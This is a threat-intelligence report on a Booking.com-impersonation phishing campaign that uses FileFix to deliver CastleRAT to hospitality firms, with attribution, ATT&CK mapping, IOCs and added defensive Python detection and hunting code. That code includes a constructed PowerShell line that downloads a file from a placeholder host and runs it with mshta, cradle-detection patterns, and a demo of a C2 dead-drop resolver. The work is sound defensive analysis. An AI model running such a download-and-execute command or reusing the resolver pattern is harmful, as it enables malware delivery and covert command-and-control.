‘Tis the Season for Attacks Spoofing Booking.com

December 11, 2025 | 10 min read

Thomas Elkins and Joshua Green

BlueVoyant’s Threat Fusion Cell (TFC) observed a Booking[.]com-impersonation phishing attack that used a novel FileFix technique to deliver CastleRAT malware to a hospitality sector client. The attack chain and subsequent infrastructure analysis revealed a large-scale, fast-cycling domain ecosystem aligned with the Transient Marauder/GrayBravo threat cluster. These connections confirm the adversary as a serious initial access threat that reuses its lure themes repeatedly and, most likely, seasonally. Booking[.]com itself was not involved or compromised; all Booking[.]com references relate solely to adversary brand impersonation.

What Happened? 

The attack began with a socially engineered email bearing the subject “Visitor reply needed now,” sent to a business service email account at a hospitality sector organization, which suggests careful reconnaissance and sector-specific targeting.

Clicking the embedded link (hxxps[://]daytonaliedetector[.]com/d7hv) redirected the user to a landing page at hxxps[://]booking.complaint-forms[.]com, a fraudulent domain crafted to impersonate Booking[.]com (the brand appears only as a subdomain label; the registered domain is complaint-forms[.]com). The page hosted a FileFix prompt instructing the user to: (1) click “Verify,” which opens a File Explorer window; (2) press Ctrl+L to focus the File Explorer address bar; (3) press Ctrl+V to paste into it a command the page had silently copied to the clipboard; and (4) press Enter to execute it. The File Explorer address bar runs a pasted command much as the Run dialog would, so the user’s own keystrokes launch the payload without any file being downloaded through the browser.


The pasted command was heavily obfuscated. It launched a hidden PowerShell window that fetched an HTML file from the primary payload server bikolsa[.]com, saved it in the ProgramData directory, and launched it with mshta.exe to execute the embedded scripts. That multi-stage process involved VBScript decoding and extraction, leading to the download of a zip archive from a secondary subdomain, which deployed the final payload, identified through analysis as CastleRAT.
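The chain above (explorer.exe spawning a hidden, encoded PowerShell, which in turn runs mshta.exe on a file in ProgramData) is what a detection engineer would turn into process-creation logic. The block below is an added example written for this page, not BlueVoyant’s detection content: it runs over constructed events shaped like Sysmon Event ID 1 fields, decodes a PowerShell -EncodedCommand (base64 of the script as UTF-16LE) so download cradles hidden inside it are visible, and flags both stages. The event data, the file name hv.html and the host payload.example are placeholders, not indicators from the incident.

```python
"""Detection logic for the FileFix / ClickFix -> PowerShell -> mshta chain,
run over constructed process-creation events (Sysmon Event ID 1-like fields).
Everything in SAMPLE_EVENTS is made up for the example; payload.example is a
placeholder host, not an indicator from the incident."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


# PowerShell accepts unique switch prefixes, so "-w h", "-win hidden" and
# "-WindowStyle Hidden" all hide the window.
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+h(?:idden)?\b", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|\bcurl\b|\bwget\b|https?://", re.I)
MSHTA_ARG_RE = re.compile(r"programdata|https?://|\.hta\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """-EncodedCommand carries the script as base64(UTF-16LE); return it or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(events):
    """Return one finding per suspicious event: {"rule", "image", "decoded"}."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        decoded = decode_encoded_command(ev.command_line)
        visible = ev.command_line + ("\n" + decoded if decoded else "")
        # Stage 1: explorer.exe (Explorer address bar or Run dialog) spawning a
        # hidden, encoded or downloading PowerShell. A bare "powershell.exe"
        # from explorer.exe is a user opening a console and is not flagged.
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe":
            if HIDDEN_RE.search(ev.command_line) or decoded or CRADLE_RE.search(visible):
                findings.append({"rule": "filefix_clickfix_candidate",
                                 "image": img, "decoded": decoded})
        # Stage 2: mshta.exe launched by a shell, or handed a ProgramData path,
        # a URL or an .hta file, matches the HTML-in-ProgramData step.
        elif img == "mshta.exe" and (parent in SHELLS or MSHTA_ARG_RE.search(ev.command_line)):
            findings.append({"rule": "mshta_stage2", "image": img, "decoded": None})
    return findings


# The stage-1 script is encoded here the way PowerShell expects, so the sample
# is realistic without hand-typing base64.
STAGE1_SCRIPT = '$p="$env:ProgramData\\hv.html";iwr https://payload.example/pipa -OutFile $p;mshta $p'
STAGE1_ENCODED = base64.b64encode(STAGE1_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe"),            # benign console
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe", "notepad.exe C:\\Users\\a\\notes.txt"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              f"powershell.exe -w hidden -ep bypass -enc {STAGE1_ENCODED}"),  # stage 1
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"mshta C:\ProgramData\hv.html"),                          # stage 2
]

if __name__ == "__main__":
    for f in classify(SAMPLE_EVENTS):
        print(f["rule"], f["image"], (f["decoded"] or "").splitlines()[:1])
```

Both the Run dialog (ClickFix) and the Explorer address bar (FileFix) produce explorer.exe as the parent, and so does a user launching PowerShell from the Start menu, so the window-style, encoding and download-cradle conditions carry the signal and need tuning per environment. The decoder only handles -EncodedCommand; string-concatenation and other obfuscation layers of the kind seen here are best resolved by PowerShell Script Block Logging (Event ID 4104), which records the de-obfuscated script as it executes.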


Infrastructure Analysis 

The attack’s infrastructure footprint included connections to kakapupuneww[.]com and miteamss[.]com; the latter has also been linked to a trojanized utility named Advanced.IP.Scanner2.5.4594.1.exe (named to mimic the legitimate Advanced IP Scanner tool) between September and December 2025. BlueVoyant also observed callouts to the geolocation service ip-api[.]com and to Steam Community pages, the latter consistent with command-and-control dead drops: the malware does not carry its real C2 address hardcoded; instead, at run time it visits a neutral, public-facing platform (the “dead drop”) and reads the current C2 address from content the operator controls there. This lets the operator move C2 without shipping a new binary and hides the lookup inside traffic to a well-known site. Together, this illustrates a well-resourced and layered operational setup.
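To make the dead-drop pattern concrete, the following added example (written for this page, not BlueVoyant’s or CastleRAT’s code) shows both sides of it: how a resolver pulls a current C2 address out of an otherwise ordinary public profile page, and the hunt that follows from it, flagging processes other than browsers and the Steam client that talk to steamcommunity[.]com or ip-api[.]com. The profile page, the ||| marker format, the C2 address (a TEST-NET-2 example address) and the connection events are all constructed; the marker format is an assumption for illustration and is not CastleRAT’s real encoding.

```python
"""Dead-drop resolver pattern and the matching hunt. The page text, the marker
format, the C2 address and all connection events are constructed for this
example; the marker format is not CastleRAT's real encoding."""
import base64
import re
from dataclasses import dataclass

# --- 1. What a dead-drop resolver does --------------------------------------
# The current C2 sits in a profile summary between markers the malware knows.
# Encoding the value at build time keeps the sample honest: the page must
# decode back to C2_URL.
C2_URL = "https://198.51.100.23:8443"      # TEST-NET-2 address, non-routable
MARK = "|||"
PROFILE_PAGE = f"""<html><body>
<div class="profile_summary">Just here for the games.
{MARK}{base64.b64encode(C2_URL.encode()).decode()}{MARK}
</div></body></html>"""

DROP_RE = re.compile(re.escape(MARK) + r"([A-Za-z0-9+/=]+)" + re.escape(MARK))


def resolve_c2(page_html):
    """Return the C2 URL embedded in the page, or None if no marker or valid URL is found."""
    m = DROP_RE.search(page_html)
    if not m:
        return None
    try:
        candidate = base64.b64decode(m.group(1), validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    return candidate if re.fullmatch(r"https?://[\w.\-]+(:\d+)?(/\S*)?", candidate) else None


# --- 2. The hunt ------------------------------------------------------------
# Legitimate traffic to these hosts comes from browsers and the Steam client;
# a hospitality back-office host has little reason for anything else to reach them.
DEAD_DROP_HOSTS = {"steamcommunity.com", "ip-api.com"}
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "steam.exe", "steamwebhelper.exe"}


@dataclass
class NetEvent:   # Sysmon Event ID 3-like fields
    image: str
    dest_host: str
    dest_port: int


def hunt(events):
    """Flag non-browser, non-Steam processes talking to the dead-drop hosts."""
    hits = []
    for ev in events:
        proc = ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        host = ev.dest_host.lower().strip(".")
        if any(host == h or host.endswith("." + h) for h in DEAD_DROP_HOSTS) \
                and proc not in EXPECTED_CLIENTS:
            hits.append((proc, host, ev.dest_port))
    return hits


SAMPLE_NET = [   # constructed
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "steamcommunity.com", 443),
    NetEvent(r"C:\ProgramData\svc\updater.exe", "ip-api.com", 80),
    NetEvent(r"C:\ProgramData\svc\updater.exe", "steamcommunity.com", 443),
    NetEvent(r"C:\Windows\System32\svchost.exe", "ctldl.windowsupdate.com", 80),
]

if __name__ == "__main__":
    print("resolved C2:", resolve_c2(PROFILE_PAGE))
    for hit in hunt(SAMPLE_NET):
        print("suspicious:", hit)
```

The resolver is the reason the hunt works: because the C2 address is fetched from a public platform at run time, the one thing the malware cannot avoid is a request to that platform from a process that has no business making it. Blocking the platform outright is rarely an option, so the process-to-destination pairing is the practical control, alongside watching for the ip-api[.]com geolocation check that precedes it.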

BlueVoyant’s Threat Fusion Cell pivoted on the related IOCs and found an industrial-scale, automated infrastructure operation supporting the observed campaign: more than 1,500 domains from the campaign’s start in late August through continued attacks into early December 2025. The findings point to a sophisticated and resilient operational capability built for mass phishing and malware distribution.

The domain naming conventions are meticulously crafted to mimic legitimate Booking[.]com workflows, verification steps and customer service processes, using predictable patterns such as “verifycard[number]-booking[.]com,” “confirmation-id[number][.]com,” and “guestverify[number]-booking[.]com.” These domains are entirely malicious and not associated with Booking[.]com; they reflect broad brand impersonation intended to create a veneer of authenticity and exploit trust in branded communication, not a compromise of Booking[.]com systems.

Temporal analysis of domain registration and activity windows shows a highly dynamic and evasive infrastructure strategy. The vast majority of the domains (over 1,300) were active for less than 30 days, more than 1,000 for under nine days, and a significant portion for less than 24 hours, indicating rapid churn of disposable domains to outrun blocklists and reputation-based filters. A smaller subset (~140) remained active for over 60 days, and just over 40 were observed for more than 90 days; these longer-lived domains likely serve as core redirectors or payload servers within the multi-tiered infrastructure, acting as resilient channels for distributing initial scripts or managing stolen data. The activity also appears to be part of an ongoing campaign stretching back to at least mid-2024, with an activity spike toward the end of August 2025 marking the latest surge.
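The two preceding paragraphs describe a triage that a threat-intel team repeats constantly: match candidate domains against the lure naming patterns, flag any other use of the brand outside Booking[.]com’s own registrable domain (which also catches the booking.complaint-forms[.]com subdomain trick from the incident), and bucket each domain by observed lifetime at the same cut points the analysis uses (24 hours, 9, 30, 60 and 90 days). The block below is an added example written for this page, not BlueVoyant’s tooling; the domain names follow the patterns quoted above and the page’s IOCs, but every first-seen/last-seen timestamp is constructed, and the two-label “registrable domain” shortcut is a stated simplification.

```python
"""Infrastructure triage: lure-pattern matching, brand-impersonation check and
lifetime bucketing. Timestamps are constructed; the registrable-domain helper is
a deliberate simplification (a real pipeline would use the public suffix list)."""
import re
from collections import Counter
from datetime import datetime, timedelta

# Lure patterns quoted in the report ("[number]" is a run of digits).
LURE_PATTERNS = [
    re.compile(r"^verifycard\d+-booking\.com$", re.I),
    re.compile(r"^confirmation-id\d+\.com$", re.I),
    re.compile(r"^guestverify\d+-booking\.com$", re.I),
]
BRAND = "booking"
LEGITIMATE = {"booking.com"}   # assumption: the brand's own registrable domain


def registrable(domain):
    """Last two labels only; assumption for the example, not suffix-list aware."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def classify_domain(domain):
    """Return 'lure_pattern', 'brand_impersonation' or None."""
    d = domain.lower().strip(".")
    if registrable(d) in LEGITIMATE:
        return None
    if any(p.match(d) for p in LURE_PATTERNS):
        return "lure_pattern"
    # Brand as a whole label, or as a hyphen-delimited token inside a label,
    # anywhere in the name: catches booking.complaint-forms.com and
    # verifycard1-booking.com alike.
    if any(BRAND in label.split("-") for label in d.split(".")):
        return "brand_impersonation"
    return None


# Lifetime buckets mirroring the report's cut points.
BUCKETS = [("<24h", timedelta(hours=24)), ("24h-9d", timedelta(days=9)),
           ("9d-30d", timedelta(days=30)), ("30d-60d", timedelta(days=60)),
           ("60d-90d", timedelta(days=90)), (">90d", None)]


def lifetime_bucket(first_seen, last_seen):
    span = last_seen - first_seen
    for label, limit in BUCKETS:
        if limit is None or span < limit:
            return label


def triage(records):
    """records: iterable of (domain, first_seen, last_seen) -> {domain: (class, bucket)}."""
    return {d: (classify_domain(d), lifetime_bucket(f, l)) for d, f, l in records}


def lifetime_histogram(records, only_flagged=True):
    """Bucket counts, by default restricted to domains the classifier flagged."""
    return Counter(b for cls, b in triage(records).values() if cls or not only_flagged)


D = datetime
SAMPLE = [   # constructed observations (domain, first seen, last seen)
    ("verifycard8841-booking.com",   D(2025, 9, 1),  D(2025, 9, 1, 6)),
    ("confirmation-id2231.com",      D(2025, 9, 1),  D(2025, 9, 5)),
    ("guestverify17-booking.com",    D(2025, 9, 1),  D(2025, 9, 20)),
    ("booking.complaint-forms.com",  D(2025, 11, 1), D(2025, 12, 1)),
    ("kakapupuneww.com",             D(2025, 9, 10), D(2025, 11, 20)),
    ("bikolsa.com",                  D(2025, 8, 25), D(2025, 12, 1)),
    ("booking.com",                  D(2024, 1, 1),  D(2025, 12, 1)),
]

if __name__ == "__main__":
    for d, (cls, b) in triage(SAMPLE).items():
        print(f"{d:32} {str(cls):22} {b}")
    print(lifetime_histogram(SAMPLE))
```

The point of separating the two outputs is that they answer different questions: the classification tells you what to block or sinkhole, while the lifetime histogram tells you which domains are worth a deeper pivot. In the report’s data the short-lived lure domains are throwaways, and the handful of domains that survive 60 or 90 days are the redirectors and payload servers whose reuse links the incident to the wider campaign.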

The widespread use of HTTPS across these URLs, even on throwaway malicious domains, further shows the actor’s focus on appearing legitimate and evading simple checks that flag unencrypted connections. The infrastructure is not monolithic: it is partitioned, with distinct clusters of domains and URLs handling different stages of the attack chain (initial redirection; ClickFix or FileFix prompt delivery, the latter observed for the first time with this actor in the attack above; payload retrieval; and data exfiltration), creating a flexible, distributed system that survives the takedown of individual components without collapsing the operation.

Links to GrayBravo and More

This incident investigation and subsequent campaign analysis reveal multiple similarities between the observed attack chain and the CastleRAT malware campaign techniques detailed in early September by Recorded Future and further elaborated in Recorded Future’s December report on GrayBravo, specifically activity Cluster 3 in that report, to which BlueVoyant has assigned the moniker Transient Marauder. In parallel, eSentire separately reported the same activity as NightShadeC2, which BlueVoyant now treats as an alias for CastleRAT.

The initial access vector matches the described ClickFix approach using Booking[.]com-themed landing pages (again, purely impersonation, with no connection to Booking[.]com), except that the BlueVoyant case is the first observed use of a FileFix technique by this adversary. The attack chain’s reliance on PowerShell to retrieve and execute a remote HTML file mirrors the .NET-based loader methodology described in the reporting. The final payload’s behavior, querying ip-api[.]com for geolocation and VPN detection and using Steam Community URLs for dynamic C2 routing, is a hallmark of CastleRAT’s (a.k.a. NightShadeC2) fingerprinting and evasion techniques. Additionally, the keylogging and clipboard harvesting capability described by eSentire was also observed in the sample analyzed by BlueVoyant researchers, with stolen data written to AppData directories. Delivery of the malware as a zip archive retrieved from a disguised domain further echoes CastleRAT distribution and cements the tactical alignment.

Furthermore, the malware’s ability to download and execute additional payloads aligns closely with the technical specifications of both the C and Python variants of CastleRAT described in OSINT reporting. The observed network callouts to steamcommunity[.]com correlate with the reported use of Steam profiles as C2 dead drops, a technique that lets the operator update infrastructure without altering the malware binary. The broader infrastructure ties, including the use of Cloudflare-protected domains for payload delivery and the presence of tiered C2 servers, reflect the multi-layered infrastructure model that Recorded Future’s Insikt Group attributed to Transient Marauder (a.k.a. GrayBravo Cluster 3), confirming a highly organized and resilient operational architecture.

BlueVoyant researchers also identified significant overlap between the Transient Marauder and Microsoft’s Storm-1865 cluster reported in March 2025. Both used an identical infection chain that tricks users with ClickFix into executing commands via Windows' mshta.exe utility to deploy commodity malware payloads. The sustained focus on the hospitality industry from late 2024 into early 2025, combined with strongly correlated social engineering lures, similar technical delivery mechanisms, and overlapping payloads, leads BlueVoyant to assess with high confidence that these clusters represent the same threat entity or a tightly coordinated alliance. 

Finally, the activity also aligns closely with Netcraft reporting that described a sprawling, interconnected cybercriminal ecosystem targeting the hospitality sector, distinguished by a shared initial attack vector but divergent final objectives. This cumulative, linked reporting highlights the massive and sophisticated use of Booking[.]com (and other travel services) brand impersonation, employing identical domain naming conventions, such as “verifycard[number]-booking.com” and “confirmation-id[number].com,” across a vast, evasive infrastructure numbering in the thousands of domains.

The campaigns unfold on at least two distinct fronts. The first front, described in the attack observed by BlueVoyant above and by others, uses these lures to deploy malware such as CastleRAT via ClickFix/FileFix social engineering, aiming to gain initial access to the systems of hospitality sector entities. A second front, detailed by Netcraft, exploits that same initial access or parallel infiltration methods for a different goal: direct financial fraud. Here, the vast phishing infrastructure is used to target the guests of previously compromised hotels, tricking them with convincing lures related to their reservations. The goal is to convince guests to provide credit card information for fraudulent transactions, in a scheme known as “carding.” This two-pronged approach demonstrates a highly organized criminal operation in which the compromise of hospitality providers enables a secondary, highly profitable wave of attacks against their customers, with both fronts leveraging the same core infrastructure and deceptive tactics for maximum impact.

Conclusion 

At no point in this campaign did BlueVoyant observe any compromise of Booking.com systems; all Booking.com references in this report relate solely to adversary spoofing activity.  

BlueVoyant's investigation highlights four critical findings regarding the Transient Marauder (a.k.a. GrayBravo Cluster 3) adversary's recent campaign. First, the observed attack demonstrates the group's adoption of a new tactic with the FileFix technique, a sophisticated social engineering method that manipulates users into executing malicious commands via the file explorer, representing an evolution from their previously documented ClickFix approach. Second, the technical evidence showed strong, direct overlap with Recorded Future's detailing of Transient Marauder activity, confirming this campaign's place within the adversary's broader operational framework. Third, the seamless alignment of these TTPs with those of the Microsoft-designated Storm-1865 group, from shared victimology in the hospitality industry to identical payloads and delivery mechanisms, leads BlueVoyant to assess with high confidence that Transient Marauder and Storm-1865 are part of the same activity cluster. This connection suggests a persistent threat against the sector that has been running well over a year and evolving its attacks. 

Finally, while Recorded Future's analysis of Transient Marauder (a.k.a. GrayBravo Cluster 3) focused on the initial access and malware delivery phase, at least one of the campaign's objectives is confirmed by the significant linkages between BlueVoyant-identified campaign infrastructure and earlier Netcraft reporting. That goal is the compromise of hospitality sector entities to serve as a launchpad for a secondary, highly profitable wave of attacks. This subsequent front targets the compromised hotels' guests with fraudulent credit card phishing lures, exploiting stolen reservation data to create a two-tiered monetization strategy that maximizes impact and financial gain from a single initial intrusion. 

Organizations within the hospitality sector, as a primary target of this campaign, must prioritize security awareness training that is tailored to the specific threats their employees who manage their business communications face. Training should move beyond generic phishing examples to simulate highly targeted Business Email Compromise (BEC) attacks, specifically those impersonating booking platforms like Booking[.]com. Personnel should be drilled on the hallmarks of these scams, such as urgency ("reply needed now"), spoofed sender addresses, and instructions to bypass normal procedures. 

Individuals who receive a suspicious communication purportedly from a booking platform or hotel should take immediate steps to verify its legitimacy without engaging with the potentially malicious content. Do not click on any links or call any numbers provided in the email. Instead, navigate directly to the official website of the hotel or travel agency by typing the known URL into your browser or using a previously saved bookmark. Contact the establishment directly using the official phone number or email address listed on their confirmed website to inquire about the message. Under no circumstances should you follow instructions to open the Windows Run prompt or the File Explorer address bar, paste and execute copied commands, or install any “verification” software, as these steps are designed to infect your device.

BlueVoyant's TFC used this intelligence to distill relevant behaviors and indicators and map them to BlueVoyant's current coverage and detection portfolio to pinpoint potential visibility enhancements. Using those findings, BlueVoyant built and deployed focused hunt packages and tuned detections to proactively surface related activity across environments. The results flow back into playbooks and detection engineering, so each hunt tightens fidelity and accelerates future investigations.

MITRE ATT&CK Techniques 

T1566.002 Spearphishing Link  

T1583.001 Domains  

T1027.010 Command Obfuscation  

T1059.001 PowerShell  

T1218.005 Mshta  

T1059.005 Visual Basic  

T1560.001 Archive via Utility  

T1056.001 Keylogging  

T1115 Clipboard Data  

T1568.001 Fast Flux DNS  

T1102.001 Dead Drop Resolver  

T1568.002 Domain Generation Algorithms  

T1036.005 Match Legitimate Resource Name or Location  

T1104 Multi-Stage Channels  

T1590.006 Network Security Appliances  

T1071.001 Web Protocols  

T1114.002 Remote Email Collection  

T1105 Ingress Tool Transfer  

T1078.002 Domain Accounts  

T1562.001 Disable or Modify Tools  

T1567.002 Exfiltration to Cloud Storage  

T1074.001 Local Data Staging  

T1132.001 Standard Encoding  

T1090.003 Multi-hop Proxy  

T1590.001 Domain Properties 

Indicators of Compromise 

hxxps[://]daytonaliedetector[.]com/d7hv 

hxxps[://]booking.complaint-forms[.]com 

hxxps[://]bikolsa[.]com/pipa 

daytonaliedetector[.]com 

booking[.]complaint-forms[.]com 

bikolsa[.]com 

kakapupuneww[.]com 
